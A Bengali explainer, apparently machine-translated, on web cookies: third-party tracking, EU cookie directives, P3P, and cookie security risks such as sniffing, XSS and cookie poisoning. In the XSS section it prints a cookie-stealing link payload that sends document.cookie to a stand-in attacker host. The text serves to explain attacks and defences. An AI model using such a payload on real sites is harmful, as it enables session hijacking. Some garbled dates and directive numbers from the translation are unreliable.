ওয়েব ব্যবহারকারীদের গোপনীয়তা এবং বেনামীর জন্য কুকিজের গুরুত্বপূর্ণ প্রভাব রয়েছে। যদিও কুকিগুলি শুধুমাত্র সেই সার্ভারে ফেরত পাঠানো হয় যা সেগুলিকে সেট করে বা একই ইন্টারনেট ডোমেনের অন্তর্গত একটি সার্ভারে, তবে একটি ওয়েব পৃষ্ঠায় অন্যান্য ডোমেনের অন্তর্গত সার্ভারে সংরক্ষিত ছবি বা অন্যান্য উপাদান থাকতে পারে। এই বাহ্যিক উপাদানগুলির পুনরুদ্ধারের সময় যে কুকিগুলি সেট করা হয় তাকে বলা হয় তৃতীয় পক্ষের কুকিজ. এর মধ্যে অবাঞ্ছিত পপ-আপ উইন্ডো থেকে কুকিজ রয়েছে।
বিজ্ঞাপন কোম্পানীগুলি ব্যবহারকারীদের বিভিন্ন সাইট পরিদর্শন করার জন্য তৃতীয় পক্ষের কুকি ব্যবহার করে। বিশেষ করে, একটি বিজ্ঞাপন কোম্পানি সমস্ত পৃষ্ঠা জুড়ে একজন ব্যবহারকারীকে ট্র্যাক করতে পারে যেখানে এটি বিজ্ঞাপনের ছবি বা একটি ট্র্যাকিং পিক্সেল রেখেছে। ব্যবহারকারীর দ্বারা পরিদর্শন করা পৃষ্ঠাগুলির জ্ঞান বিজ্ঞাপন সংস্থাকে ব্যবহারকারীর বিজ্ঞাপনের পছন্দগুলি লক্ষ্য করতে দেয়৷
ব্যবহারকারীর প্রোফাইল তৈরি করার ক্ষমতাকে কেউ কেউ গোপনীয়তা আক্রমণ বলে মনে করেন, বিশেষ করে যখন তৃতীয় পক্ষের কুকি ব্যবহার করে বিভিন্ন ডোমেনে ট্র্যাকিং করা হয়। এই কারণে, কিছু দেশে কুকি আইন আছে।
হোয়াইট হাউস ড্রাগ পলিসি অফিস অনলাইনে ওষুধের বিজ্ঞাপন দেখার ব্যবহারকারীদের কম্পিউটার ট্র্যাক করার জন্য কুকিজ ব্যবহার করছে বলে প্রকাশের পর মার্কিন যুক্তরাষ্ট্র সরকার 2000 সালে কুকিজ স্থাপনের উপর কঠোর নিয়ম প্রয়োগ করে। 2002 সালে, গোপনীয়তা কর্মী ড্যানিয়েল ব্র্যান্ড আবিষ্কার করেন যে সিআইএ তার ওয়েবসাইটগুলি পরিদর্শন করা কম্পিউটারগুলিতে ক্রমাগত কুকি রেখে গেছে। একবার এই লঙ্ঘন সম্পর্কে জানানো হলে, সিআইএ ঘোষণা করে যে এই কুকিগুলি ইচ্ছাকৃতভাবে পাঠানো হয়নি এবং সেগুলি সেট করা বন্ধ করে দিয়েছে। 25 ডিসেম্বর, 2005-এ, ব্রান্ডট আবিষ্কার করেন যে ন্যাশনাল সিকিউরিটি এজেন্সি (NSA) একটি সফ্টওয়্যার আপডেটের কারণে দর্শকদের কম্পিউটারে দুটি স্থায়ী কুকি রেখে গেছে। অবহিত হওয়ার পরে, NSA অবিলম্বে কুকিজ নিষ্ক্রিয় করেছে।
যুক্তরাজ্যে, দ কুকি আইন “, 25 মে, 2012-এ কার্যকর করা হয়েছে, সাইটগুলিকে তাদের অভিপ্রায় ঘোষণা করতে বাধ্য করে, এইভাবে ব্যবহারকারীরা তাদের ইন্টারনেটে তাদের উত্তরণের চিহ্ন রেখে যেতে চান কিনা তা বেছে নেওয়ার অনুমতি দেয়৷ তারা এইভাবে বিজ্ঞাপন লক্ষ্যবস্তু থেকে রক্ষা করা যেতে পারে. যাহোক, অনুসারে অভিভাবক, ইন্টারনেট ব্যবহারকারীদের সম্মতি অগত্যা স্পষ্ট নয়; ব্যবহারকারীর সম্মতির শর্তাবলীতে পরিবর্তন করা হয়েছে, এটি তৈরি করা হয়েছে এইভাবে উহ্য.
গোপনীয়তার উপর নির্দেশিকা 2002/58
নির্দেশিকা 202/58 গোপনীয়তা এবং ইলেকট্রনিক যোগাযোগ, কুকিজ ব্যবহারের নিয়ম রয়েছে। বিশেষ করে, অনুচ্ছেদ 5, এই নির্দেশের অনুচ্ছেদ 3 প্রয়োজন যে ব্যবহারকারীর কম্পিউটারে ডেটা (যেমন কুকিজ) সংরক্ষণ করা শুধুমাত্র তখনই করা যেতে পারে যদি:
- ডেটা কীভাবে ব্যবহার করা হয় তা ব্যবহারকারীকে জানানো হয়;
- ব্যবহারকারীকে এই স্টোরেজ অপারেশন প্রত্যাখ্যান করার বিকল্প দেওয়া হয়। যাইহোক, এই নিবন্ধে আরও বলা হয়েছে যে প্রযুক্তিগত কারণে ডেটা সংরক্ষণ এই আইন থেকে অব্যাহতিপ্রাপ্ত।
অক্টোবর 2003 থেকে বাস্তবায়িত হওয়ার কারণে, ডিসেম্বর 2004 এর একটি প্রতিবেদন অনুসারে নির্দেশটি শুধুমাত্র অত্যন্ত অসম্পূর্ণভাবে প্রয়োগ করা হয়েছিল, যা আরও নির্দেশ করে যে কিছু সদস্য রাষ্ট্র (স্লোভাকিয়া, লাটভিয়া, গ্রীস, বেলজিয়াম এবং লুক্সেমবার্গ) এখনও স্থানান্তর করেনি। গার্হস্থ্য আইনে নির্দেশ।
29 সালে G2010-এর মতামত অনুসারে, ইন্টারনেট ব্যবহারকারীর স্পষ্ট সম্মতিতে আচরণগত বিজ্ঞাপনের উদ্দেশ্যে কুকিজ ব্যবহারের শর্তযুক্ত এই নির্দেশিকাটি খুব খারাপভাবে প্রয়োগ করা হয়েছে। প্রকৃতপক্ষে, বেশিরভাগ সাইটগুলি এমনভাবে করে যা নির্দেশনা মেনে চলে না, "প্রযুক্তিগত" কুকিগুলির মধ্যে পার্থক্য না করে, ব্যবহার সম্পর্কে তথ্য না দিয়ে "কুকিজ" ব্যবহার সম্পর্কে জানানো একটি সাধারণ "ব্যানার" এর মধ্যে নিজেদেরকে সীমাবদ্ধ করে। "ট্র্যাকিং" কুকিজ, বা কারিগরি কুকিজ (যেমন শপিং কার্ট ম্যানেজমেন্ট কুকিজ) বজায় রাখতে এবং "ট্র্যাকিং" কুকিজ প্রত্যাখ্যান করতে ইচ্ছুক ব্যবহারকারীর কাছে একটি বাস্তব পছন্দের প্রস্তাব না। প্রকৃতপক্ষে, অনেক সাইট সঠিকভাবে কাজ করে না যদি কুকিজ প্রত্যাখ্যান করা হয়, যা নির্দেশিকা 2002/58 বা নির্দেশিকা 95/46 (ব্যক্তিগত ডেটা সুরক্ষা) মেনে চলে না।
নির্দেশিকা 2009/136/CE
এই উপাদানটি 2009 নভেম্বর, 136 তারিখের নির্দেশিকা 25/2009/EC দ্বারা আপডেট করা হয়েছে যা বলে যে "একজন গ্রাহক বা ব্যবহারকারীর টার্মিনাল সরঞ্জামে তথ্য সংরক্ষণ, বা ইতিমধ্যে সংরক্ষিত তথ্যে অ্যাক্সেস প্রাপ্ত করা শুধুমাত্র এই শর্তে অনুমোদিত যে গ্রাহক বা ব্যবহারকারী তার সম্মতি দিয়েছেন, প্রাপ্তির পরে, নির্দেশিকা 95/46/EC মেনে, প্রক্রিয়াকরণের উদ্দেশ্যে অন্যদের মধ্যে পরিষ্কার এবং সম্পূর্ণ তথ্য”। তাই নতুন নির্দেশিকা ইন্টারনেট ব্যবহারকারীর কম্পিউটারে কুকি স্থাপন করার আগে বাধ্যবাধকতাকে শক্তিশালী করে।
নির্দেশের প্রাথমিক বিবেচনায়, ইউরোপীয় আইন প্রণেতা উল্লেখ করেছেন: "যেখানে প্রযুক্তিগতভাবে সম্ভব এবং কার্যকর, নির্দেশিকা 95/46/EC এর প্রাসঙ্গিক বিধান অনুসারে, প্রক্রিয়াকরণের বিষয়ে ব্যবহারকারীর সম্মতি প্রকাশ করা যেতে পারে একটি ব্রাউজার বা অন্য অ্যাপ্লিকেশনের উপযুক্ত সেটিংস ব্যবহার করুন”। কিন্তু প্রকৃতপক্ষে, আজ পর্যন্ত কোনো ব্রাউজারই প্রয়োজনীয় প্রযুক্তিগত কুকিগুলিকে ঐচ্ছিক থেকে আলাদা করা সম্ভব করে না যা ব্যবহারকারীর পছন্দের উপর ছেড়ে দেওয়া উচিত।
এই নতুন নির্দেশটি বেলজিয়ামের সাংসদরা জুলাই 2012-এ স্থানান্তর করেছিলেন৷ 2014 সালের একটি সমীক্ষা দেখায় যে এমনকি সাংসদরাও প্রয়োগ করতে লড়াই করে নির্দেশের সীমাবদ্ধতা.
P3P
P3P স্পেসিফিকেশন একটি সার্ভারের জন্য একটি গোপনীয়তা নীতি বলার ক্ষমতা অন্তর্ভুক্ত করে, যা সংজ্ঞায়িত করে যে এটি কী ধরনের তথ্য সংগ্রহ করে এবং কী উদ্দেশ্যে। এই নীতিগুলির মধ্যে কুকিজ ব্যবহার করে সংগৃহীত তথ্যের ব্যবহার অন্তর্ভুক্ত (কিন্তু সীমাবদ্ধ নয়)। P3P এর সংজ্ঞা অনুসারে, একটি ব্রাউজার ব্যবহারকারীর পছন্দের সাথে গোপনীয়তা নীতির তুলনা করে বা ব্যবহারকারীকে জিজ্ঞাসা করে, সার্ভার দ্বারা ঘোষিত গোপনীয়তা নীতি গোপনীয়তা বিবৃতি উপস্থাপন করে কুকি গ্রহণ বা প্রত্যাখ্যান করতে পারে।
Apple Safari এবং Microsoft Internet Explorer সংস্করণ 6 এবং 7 সহ অনেক ব্রাউজার, P3P সমর্থন করে যা ব্রাউজারকে তৃতীয় পক্ষের কুকি স্টোরেজ গ্রহণ করতে হবে কিনা তা নির্ধারণ করতে দেয়। অপেরা ব্রাউজার ব্যবহারকারীদের তৃতীয় পক্ষের কুকিজ প্রত্যাখ্যান করতে এবং ইন্টারনেট ডোমেনের জন্য একটি বিশ্বব্যাপী এবং নির্দিষ্ট নিরাপত্তা প্রোফাইল তৈরি করতে দেয়। মজিলা ফায়ারফক্স সংস্করণ 2 P3P সমর্থন বাদ দিয়েছে কিন্তু সংস্করণ 3 এ এটি পুনঃস্থাপন করেছে।
ব্যবহারকারীর ওয়েব অভিজ্ঞতাকে নেতিবাচকভাবে প্রভাবিত না করেই গোপনীয়তা বাড়াতে এবং বিজ্ঞাপন ট্র্যাকিং কমাতে তৃতীয় পক্ষের কুকিগুলি বেশিরভাগ ব্রাউজার দ্বারা ব্লক করা যেতে পারে। অনেক বিজ্ঞাপন সংস্থা একটি বিকল্প প্রস্তাব অনির্বাচন লক্ষ্যযুক্ত বিজ্ঞাপনের জন্য, ব্রাউজারে একটি জেনেরিক কুকি সেট আপ করে যা এই টার্গেটিং নিষ্ক্রিয় করে, কিন্তু এই জাতীয় সমাধান কার্যত কার্যকর হয় না, যখন এটিকে সম্মান করা হয়, কারণ ব্যবহারকারী এই কুকিগুলি মুছে ফেলার সাথে সাথে এই জেনেরিক কুকিটি মুছে ফেলা হয় যা অপ্ট বাতিল করে। সিদ্ধান্ত আউট
কুকির অসুবিধা
গোপনীয়তা সমস্যা ছাড়াও, কুকিজ কিছু প্রযুক্তিগত ত্রুটি আছে. বিশেষ করে, তারা সবসময় সঠিকভাবে ব্যবহারকারীদের সনাক্ত করে না, তারা সাইটের কর্মক্ষমতা কমিয়ে দিতে পারে যখন বড় সংখ্যায়, তারা নিরাপত্তা আক্রমণের জন্য ব্যবহার করা যেতে পারে, এবং তারা প্রতিনিধিত্বমূলক রাষ্ট্র স্থানান্তর, সফ্টওয়্যারটির স্থাপত্য শৈলীর সাথে দ্বন্দ্ব করে।
অসম্পূর্ণ শনাক্তকরণ
যদি একটি কম্পিউটারে একাধিক ব্রাউজার ব্যবহার করা হয়, তবে তাদের প্রতিটিতে সর্বদা কুকিজের জন্য একটি পৃথক স্টোরেজ ইউনিট থাকে। কুকিজ তাই একজন ব্যক্তিকে চিহ্নিত করে না, কিন্তু একটি ব্যবহারকারীর অ্যাকাউন্ট, একটি কম্পিউটার এবং একটি ওয়েব ব্রাউজারের সমন্বয়। এইভাবে, যে কেউ এই অ্যাকাউন্ট, কম্পিউটার বা ব্রাউজারগুলি ব্যবহার করতে পারে যেখানে কুকির প্যানোপলি রয়েছে৷ একইভাবে, কুকিগুলি একই ব্যবহারকারীর অ্যাকাউন্ট, কম্পিউটার এবং ব্রাউজার ভাগ করে এমন একাধিক ব্যবহারকারীর মধ্যে পার্থক্য করে না, যেমন "ইন্টারনেট ক্যাফে" বা কম্পিউটার সংস্থানগুলিতে বিনামূল্যে অ্যাক্সেস প্রদান করে এমন কোনও জায়গায়।
কিন্তু বাস্তবে এই বিবৃতিটি বেশিরভাগ ক্ষেত্রেই ভুল বলে প্রমাণিত হয় কারণ বর্তমানে একটি "ব্যক্তিগত" কম্পিউটার (বা একটি স্মার্টফোন, বা ট্যাবলেট, যা আরও খারাপ) প্রধানত একজন ব্যক্তি ব্যবহার করে। এটি একটি নির্দিষ্ট ব্যক্তিকে লক্ষ্য করে এবং সংগৃহীত তথ্যের পরিমাণের মাধ্যমে ব্যক্তিগতকৃত লক্ষ্যে পৌঁছানো হয় এমনকি যদি ব্যক্তিটি "নাম" চিহ্নিত না হয়।
কুকিজ চুরি
একটি কুকি নেটওয়ার্কের অন্য কম্পিউটার দ্বারা চুরি করা যেতে পারে।
স্বাভাবিক ক্রিয়াকলাপের সময়, কুকিগুলি সার্ভার (অথবা একই ডোমেনের সার্ভারের একটি গ্রুপ) এবং ব্যবহারকারীর কম্পিউটার ব্রাউজারের মধ্যে ফেরত পাঠানো হয়। যেহেতু কুকিতে সংবেদনশীল তথ্য থাকতে পারে (ব্যবহারকারীর নাম, প্রমাণীকরণের জন্য ব্যবহৃত পাসওয়ার্ড, ইত্যাদি), তাদের মান অন্য কম্পিউটারে অ্যাক্সেসযোগ্য হওয়া উচিত নয়। কুকি চুরি হল একটি অননুমোদিত তৃতীয় পক্ষের দ্বারা কুকিজ আটকানোর একটি কাজ৷
সেশন হাইজ্যাকিং নামে একটি আক্রমণে প্যাকেট স্নিফারের মাধ্যমে কুকি চুরি করা যেতে পারে। নেটে ট্র্যাফিক প্রেরণ এবং গ্রহণকারী (বিশেষত এনক্রিপ্ট করা পাবলিক ওয়াই-ফাই স্পেসে) ব্যতীত অন্য কম্পিউটার দ্বারা আটকানো এবং পড়তে পারে। এই ট্রাফিকের মধ্যে রয়েছে সাধারণ HTTP প্রোটোকল ব্যবহার করে সেশনে পাঠানো কুকিজ। যখন নেটওয়ার্ক ট্র্যাফিক এনক্রিপ্ট করা হয় না, তখন দূষিত ব্যবহারকারীরা "প্যাকেট স্নিফার" ব্যবহার করে নেটওয়ার্কের অন্যান্য ব্যবহারকারীদের যোগাযোগ পড়তে পারে।
HTTPS প্রোটোকল ব্যবহার করে ব্যবহারকারীর কম্পিউটার এবং সার্ভারের মধ্যে সংযোগ এনক্রিপ্ট করে এই সমস্যাটি কাটিয়ে উঠতে পারে। একটি সার্ভার একটি নির্দিষ্ট করতে পারে নিরাপদ পতাকা একটি কুকি সেট করার সময়; ব্রাউজার এটি শুধুমাত্র একটি নিরাপদ লাইনের মাধ্যমে পাঠাবে, যেমন একটি SSL সংযোগ।
যদিও অনেক সাইট, যদিও ব্যবহারকারীর প্রমাণীকরণের জন্য HTTPS এনক্রিপ্ট করা যোগাযোগ ব্যবহার করে (অর্থাৎ লগইন পৃষ্ঠা), পরে কার্যকারিতার কারণে এনক্রিপ্ট করা HTTP সংযোগের মাধ্যমে স্বাভাবিক হিসাবে সেশন কুকিজ এবং অন্যান্য ডেটা পাঠায়। আক্রমণকারীরা এভাবে অন্য ব্যবহারকারীর কুকিজকে আটকাতে পারে এবং উপযুক্ত সাইটে তাদের ছদ্মবেশ ধারণ করতে পারে বা কুকি আক্রমণে ব্যবহার করতে পারে।
সাইটে স্ক্রিপ্টিং: একটি কুকি যা শুধুমাত্র সার্ভার এবং ক্লায়েন্টের মধ্যে বিনিময় করা উচিত অন্য তৃতীয় পক্ষের কাছে পাঠানো হয়।
কুকিজ চুরি করার আরেকটি উপায় হল স্ক্রিপ্ট সাইটগুলি এবং ব্রাউজার নিজেই কুকিগুলিকে দূষিত সার্ভারগুলিতে পাঠায় যা সেগুলি কখনই গ্রহণ করে না৷ আধুনিক ব্রাউজারগুলি সার্ভার থেকে কোডের চাওয়া-পাওয়া অংশগুলি সম্পাদনের অনুমতি দেয়। রানটাইম চলাকালীন কুকিজ অ্যাক্সেস করা হলে, তাদের মানগুলি সার্ভারগুলিতে কিছু আকারে যোগাযোগ করা যেতে পারে যেগুলি তাদের অ্যাক্সেস করা উচিত নয়। নেটওয়ার্কে পাঠানোর আগে কুকিজ এনক্রিপ্ট করা আক্রমণকে ব্যর্থ করতে সাহায্য করে না।
এই ধরনের সাইট স্ক্রিপ্টিং সাধারণত আক্রমণকারীদের দ্বারা নিযুক্ত করা হয় সাইটগুলিতে যা ব্যবহারকারীদের HTML সামগ্রী পোস্ট করার অনুমতি দেয়। HTML অবদানে সামঞ্জস্যপূর্ণ কোডের একটি অংশ সংহত করে, একজন আক্রমণকারী অন্যান্য ব্যবহারকারীদের কাছ থেকে কুকি পেতে পারে। এই কুকিজগুলির জ্ঞান চুরি হওয়া কুকিজগুলি ব্যবহার করে একই সাইটে সংযোগ করে ব্যবহার করা যেতে পারে, এইভাবে সেই ব্যবহারকারী হিসাবে স্বীকৃত হয় যার কুকিগুলি চুরি হয়েছিল৷
এই ধরনের আক্রমণ প্রতিরোধ করার একটি উপায় হল HttpOnly পতাকা ব্যবহার করা; এটি একটি বিকল্প, যা পিএইচপি-তে ইন্টারনেট এক্সপ্লোরারের 6 সংস্করণ থেকে 5.2.0 সংস্করণ থেকে চালু করা হয়েছে যা স্ক্রিপ্টের কাছাকাছি ক্লায়েন্টের কাছে কুকিকে অ্যাক্সেসযোগ্য করার পরিকল্পনা করা হয়েছে। যাইহোক, ওয়েব ডেভেলপারদের তাদের সাইট ডেভেলপমেন্টের ক্ষেত্রে এটিকে বিবেচনা করা উচিত যাতে তারা সাইটে স্ক্রিপ্টিং থেকে অনাক্রম্য থাকে।
ব্যবহৃত আরেকটি নিরাপত্তা হুমকি হল সাইটে চাহিদা জালিয়াতি.
অফিসিয়াল প্রযুক্তিগত স্পেসিফিকেশন কুকিগুলিকে শুধুমাত্র সেই ডোমেনের সার্ভারগুলিতে ফেরত পাঠানোর অনুমতি দেয় যেখান থেকে তারা উদ্ভূত হয়েছিল। যাইহোক, কুকি হেডার ব্যতীত অন্য উপায় ব্যবহার করে কুকির মান অন্যান্য সার্ভারে পাঠানো যেতে পারে।
বিশেষ করে, জাভাস্ক্রিপ্টের মতো স্ক্রিপ্টিং ভাষাগুলিকে সাধারণত কুকি মানগুলি অ্যাক্সেস করার অনুমতি দেওয়া হয় এবং ইন্টারনেটের যে কোনও সার্ভারে নির্বিচারে মান পাঠাতে সক্ষম। এই স্ক্রিপ্টিং ক্ষমতা ব্যবহারকারীদের অন্যান্য ব্যবহারকারীদের দেখার জন্য HTML বিষয়বস্তু পোস্ট করার অনুমতি দেয় ওয়েবসাইট থেকে ব্যবহার করা হয়.
উদাহরণ স্বরূপ, example.com ডোমেনে অপারেট করা একজন আক্রমণকারী একটি জনপ্রিয় ব্লগের দিকে নির্দেশ করে নিম্নলিখিত লিঙ্ক সম্বলিত একটি মন্তব্য পোস্ট করতে পারে যা অন্যথায় তারা নিয়ন্ত্রণ করে না:
<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>
যখন অন্য ব্যবহারকারী এই লিঙ্কে ক্লিক করেন, ব্রাউজার কোডের অনক্লিক বৈশিষ্ট্যের অংশটি কার্যকর করে, তাই এটি document.cookie স্ট্রিংটিকে এই পৃষ্ঠার জন্য সক্রিয় ব্যবহারকারী কুকিগুলির তালিকার সাথে প্রতিস্থাপন করে। তাই, কুকিজের এই তালিকা example.com সার্ভারে পাঠানো হয়েছে, এবং আক্রমণকারী তাই এই ব্যবহারকারীর কুকি সংগ্রহ করতে সক্ষম।
এই ধরনের আক্রমণ ব্যবহারকারীর পক্ষে সনাক্ত করা কঠিন কারণ স্ক্রিপ্টটি একই ডোমেন থেকে আসে যা কুকি সেট করে এবং মান প্রেরণের অপারেশনটি সেই ডোমেন দ্বারা অনুমোদিত বলে মনে হয়। এটা বিবেচনা করা হয় যে এই ধরনের সাইট পরিচালনাকারী অ্যাডমিনিস্ট্রেটরদের দায়িত্ব দূষিত কোডের প্রকাশনা প্রতিরোধে বিধিনিষেধ জারি করা।
কুকিগুলি সরাসরি HttpOnly পতাকার সাথে পাঠানো হলে JavaScript-এর মতো ক্লায়েন্ট-সাইড প্রোগ্রামগুলিতে সরাসরি দেখা যায় না৷ সার্ভারের দৃষ্টিকোণ থেকে, শুধুমাত্র পার্থক্য হল সেট-কুকি হেডারের লাইনে HttpOnly স্ট্রিং সহ একটি নতুন ক্ষেত্র যোগ করা হয়েছে:
Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly
ব্রাউজার যখন এমন একটি কুকি পায়, তখন এটিকে সাধারণভাবে নিম্নলিখিত HTTP এক্সচেঞ্জে ব্যবহার করার কথা, কিন্তু ক্লায়েন্ট সাইডে এক্সিকিউট করা স্ক্রিপ্টে এটি দৃশ্যমান না করে। HttpOnly পতাকা কোনো অফিসিয়াল প্রযুক্তিগত স্পেসিফিকেশনের অংশ নয় এবং সমস্ত ব্রাউজারে প্রয়োগ করা হয় না। মনে রাখবেন যে বর্তমানে XMLHTTPRrequest পদ্ধতির মাধ্যমে সেশন কুকিজ পড়া ও লেখাকে আটকানোর কোন উপায় নেই।
বিষয়বস্তুর পরিবর্তন: একজন আক্রমণকারী একটি সার্ভারে একটি অবৈধ কুকি পাঠায়, সম্ভবত সার্ভার দ্বারা প্রেরিত একটি বৈধ কুকি থেকে তৈরি।
কুকিজ পরিবর্তন
যত তাড়াতাড়ি কুকিগুলি সংরক্ষণ করা এবং সার্ভারে অপরিবর্তিত ফেরত দেওয়া দরকার, একজন আক্রমণকারী কুকিগুলির মান পরিবর্তন করতে পারে সেগুলি সার্ভারে ফেরত পাঠানোর আগে৷ উদাহরণস্বরূপ, যদি একটি কুকিতে ব্যবহারকারীকে দোকানের শপিং কার্টে রাখা আইটেমগুলির জন্য মোট মূল্য দিতে হয়, তাহলে এই মানটি পরিবর্তন করলে আক্রমণকারীকে প্রারম্ভিক মূল্যের চেয়ে কম চার্জ করার ঝুঁকির মধ্যে সার্ভারকে উন্মুক্ত করে। কুকিজের মান পরিবর্তন করার প্রক্রিয়াকে বলা হয় কুকি বিষক্রিয়া এবং আক্রমণ ক্রমাগত করতে কুকি চুরির পরে ব্যবহার করা যেতে পারে।
কুকি ওভাররাইড পদ্ধতিতে, আক্রমণকারী সার্ভারে একটি অবৈধ কুকি পাঠানোর জন্য একটি ব্রাউজার ত্রুটিকে কাজে লাগায়।
বেশিরভাগ ওয়েবসাইট, তবে, শুধুমাত্র একটি সেশন আইডি সঞ্চয় করে — একটি এলোমেলোভাবে তৈরি করা অনন্য নম্বর যা সেশন ব্যবহারকারীকে শনাক্ত করতে ব্যবহৃত হয় — কুকিতে নিজেই, অন্য সমস্ত তথ্য সার্ভারে সংরক্ষণ করা হয়। এই ক্ষেত্রে, এই সমস্যা অনেকাংশে সমাধান করা হয়।
ওয়েবসাইটের মধ্যে কুকি হ্যান্ডলিং
প্রতিটি সাইটের নিজস্ব কুকিজ থাকবে বলে আশা করা হচ্ছে, তাই একটি সাইট অন্য সাইটের সাথে সম্পর্কিত কুকিগুলি সংশোধন বা তৈরি করতে সক্ষম হবে না৷ একটি ওয়েব ব্রাউজার নিরাপত্তা ত্রুটি দূষিত সাইট এই নিয়ম ভঙ্গ করার অনুমতি দিতে পারে. এই ধরনের একটি ত্রুটি শোষণ সাধারণত হিসাবে উল্লেখ করা হয় ক্রস-সাইট রান্না. এই ধরনের আক্রমণের উদ্দেশ্য সেশন আইডি চুরি হতে পারে।
ব্যবহারকারীদের ওয়েব ব্রাউজারগুলির সর্বশেষ সংস্করণগুলি ব্যবহার করা উচিত যাতে এই দুর্বলতাগুলি কার্যত দূর করা হয়।
ক্লায়েন্ট এবং সার্ভারের মধ্যে দ্বন্দ্বপূর্ণ অবস্থা
কুকির ব্যবহার ক্লায়েন্টের অবস্থা এবং কুকিতে সংরক্ষিত রাষ্ট্রের মধ্যে একটি দ্বন্দ্ব তৈরি করতে পারে। ব্যবহারকারী যদি একটি কুকি অর্জন করে এবং ব্রাউজারের "ব্যাক" বোতামে ক্লিক করে, তবে ব্রাউজারের অবস্থা সাধারণত এই অধিগ্রহণের আগের মতো থাকে না। উদাহরণস্বরূপ, যদি একটি অনলাইন স্টোরের ঝুড়ি কুকিজ ব্যবহার করে তৈরি করা হয়, ব্যবহারকারী ব্রাউজারের ইতিহাসে ফিরে আসার সময় বাস্কেটের বিষয়বস্তু পরিবর্তন করতে পারে না: যদি ব্যবহারকারী তার ঝুড়িতে একটি নিবন্ধ যোগ করার জন্য একটি বোতাম টিপে এবং "রিটার্ন" এ ক্লিক করে " বোতাম, নিবন্ধটি এইটিতেই থাকবে। এটি ব্যবহারকারীর উদ্দেশ্য নাও হতে পারে, যারা অবশ্যই নিবন্ধের সংযোজন বাতিল করতে চান। এটি অবিশ্বস্ততা, বিভ্রান্তি এবং বাগ হতে পারে। তাই ওয়েব ডেভেলপারদের এই সমস্যা সম্পর্কে সচেতন হওয়া উচিত এবং এই ধরনের পরিস্থিতি মোকাবেলার জন্য ব্যবস্থা বাস্তবায়ন করা উচিত।
কুকির মেয়াদ শেষ
গোপনীয়তা নিরাপত্তা বিশেষজ্ঞদের দ্বারা ক্রমাগত কুকির সমালোচিত হয়েছে কারণ শীঘ্রই মেয়াদ শেষ হওয়ার জন্য সেট করা হয়নি, যার ফলে ওয়েবসাইটগুলিকে ব্যবহারকারীদের ট্র্যাক করতে এবং সময়ের সাথে সাথে তাদের প্রোফাইল তৈরি করার অনুমতি দেয়৷ কুকির এই দিকটিও সেশন হাইজ্যাকিং সমস্যার একটি অংশ, কারণ একটি চুরি হওয়া অবিরাম কুকি ব্যবহার করা যেতে পারে একটি ব্যবহারকারীর ছদ্মবেশী করার জন্য যথেষ্ট সময়ের জন্য।
এছাড়াও পড়তে: গাফম: তারা কারা? কেন তারা (কখনও কখনও) এত ভীতিকর?
কুকিজ বিকল্প
কিছু ক্রিয়াকলাপ যেগুলি কুকিজ ব্যবহার করে সঞ্চালিত হতে পারে সেগুলি অন্যান্য পদ্ধতি ব্যবহার করেও সঞ্চালিত হতে পারে যা কুকিজকে বাইপাস করে বা মুছে ফেলা কুকিগুলি পুনরায় তৈরি করে, যা কুকিজের চেয়ে একইভাবে (বা কখনও কখনও অদৃশ্য হওয়ার কারণে আরও খারাপ) গোপনীয়তার সমস্যা তৈরি করে।
আইপি ঠিকানা
পৃষ্ঠায় কল করা কম্পিউটারের আইপি ঠিকানা দিয়ে ব্যবহারকারীদের ট্র্যাক করা যেতে পারে। এই কৌশলটি ওয়ার্ল্ড ওয়াইড ওয়েবের প্রবর্তনের পর থেকে পাওয়া যাচ্ছে, যেহেতু পৃষ্ঠাগুলি ডাউনলোড করা হয় সার্ভারটি ব্রাউজার বা প্রক্সি চালানো কম্পিউটারের আইপি ঠিকানার অনুরোধ করে, যদি কোনোটি ব্যবহার না করা হয়। কুকি ব্যবহার করা হচ্ছে কিনা সার্ভার এই তথ্য ট্র্যাক করতে পারে। যাইহোক, এই ঠিকানাগুলি সাধারণত কুকিজের তুলনায় একজন ব্যবহারকারীকে শনাক্ত করার ক্ষেত্রে কম নির্ভরযোগ্য কারণ কম্পিউটার এবং প্রক্সি একাধিক ব্যবহারকারী দ্বারা ভাগ করা হতে পারে এবং একই কম্পিউটার প্রতিটি কাজের সেশনে একটি ভিন্ন IP ঠিকানা পেতে পারে (যেমন c প্রায়শই টেলিফোন সংযোগের ক্ষেত্রে) .
IP ঠিকানা দ্বারা ট্র্যাকিং কিছু পরিস্থিতিতে নির্ভরযোগ্য হতে পারে, যেমন ব্রডব্যান্ড সংযোগগুলি যেগুলি দীর্ঘ সময়ের জন্য একই IP ঠিকানা বজায় রাখে, যতক্ষণ শক্তি চালু থাকে।
টরের মতো কিছু সিস্টেম ইন্টারনেটের পরিচয় গোপন রাখার জন্য ডিজাইন করা হয়েছে এবং আইপি অ্যাড্রেস দ্বারা ট্র্যাকিংকে অসম্ভব বা অবাস্তব করে তোলা হয়েছে।
URL টি
একটি আরো সুনির্দিষ্ট কৌশল ইউআরএল-এ তথ্য এম্বেড করার উপর ভিত্তি করে। URL-এর ক্যোয়ারী স্ট্রিং অংশটি হল একটি কৌশল যা সাধারণত এই উদ্দেশ্যে ব্যবহৃত হয়, তবে অন্যান্য অংশগুলিও ব্যবহার করা যেতে পারে। কুকিজ সক্রিয় না থাকলে জাভা সার্ভারলেট এবং পিএইচপি সেশন প্রক্রিয়া উভয়ই এই পদ্ধতি ব্যবহার করে।
এই পদ্ধতিতে ওয়েব সার্ভার জড়িত ওয়েব পৃষ্ঠার লিঙ্কগুলিতে স্ট্রিং অনুরোধ যুক্ত করে যা এটিকে বহন করে যখন এটি ব্রাউজারে পাঠানো হয়। যখন ব্যবহারকারী একটি লিঙ্ক অনুসরণ করে, ব্রাউজার সংযুক্ত ক্যোয়ারী স্ট্রিং সার্ভারে ফেরত দেয়।
